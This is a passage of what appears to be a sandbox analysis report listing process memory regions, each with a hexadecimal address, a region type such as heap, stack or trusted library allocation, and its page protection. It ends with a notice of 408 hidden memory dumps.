trusted library allocation
|
page read and write
|
||
|
1B044039000
|
heap
|
page read and write
|
||
|
18B68720000
|
heap
|
page read and write
|
||
|
15E73DF0000
|
heap
|
page read and write
|
||
|
640897F000
|
stack
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
15E73ED4000
|
heap
|
page read and write
|
||
|
1B03BFCF000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
18B68536000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
1B02C6CB000
|
trusted library allocation
|
page read and write
|
||
|
15E75BE2000
|
heap
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B6A5F0000
|
heap
|
page read and write
|
||
|
18B6A634000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
18B0010B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B68710000
|
trusted library allocation
|
page read and write
|
||
|
15E73EE6000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
18B68490000
|
heap
|
page read and write
|
||
|
15E75D81000
|
heap
|
page read and write
|
||
|
1B02D2D6000
|
trusted library allocation
|
page read and write
|
||
|
15E75BF4000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
15E75BE5000
|
heap
|
page read and write
|
||
|
1B04426A000
|
heap
|
page read and write
|
||
|
1B02D654000
|
trusted library allocation
|
page read and write
|
||
|
15E75BE5000
|
heap
|
page read and write
|
||
|
18B6A60E000
|
heap
|
page read and write
|
||
|
15E75C57000
|
heap
|
page read and write
|
||
|
1B02BF50000
|
heap
|
page execute and read and write
|
||
|
18B00068000
|
trusted library allocation
|
page read and write
|
||
|
1B029EC1000
|
heap
|
page read and write
|
||
|
1B02BFE0000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
15E75C2B000
|
heap
|
page read and write
|
||
|
15E75D6F000
|
heap
|
page read and write
|
||
|
18B6A530000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
18B0060E000
|
trusted library allocation
|
page read and write
|
||
|
15E75D54000
|
heap
|
page read and write
|
||
|
1B03BF70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B02A0F0000
|
heap
|
page readonly
|
There are 408 hidden memdumps, click here to show them.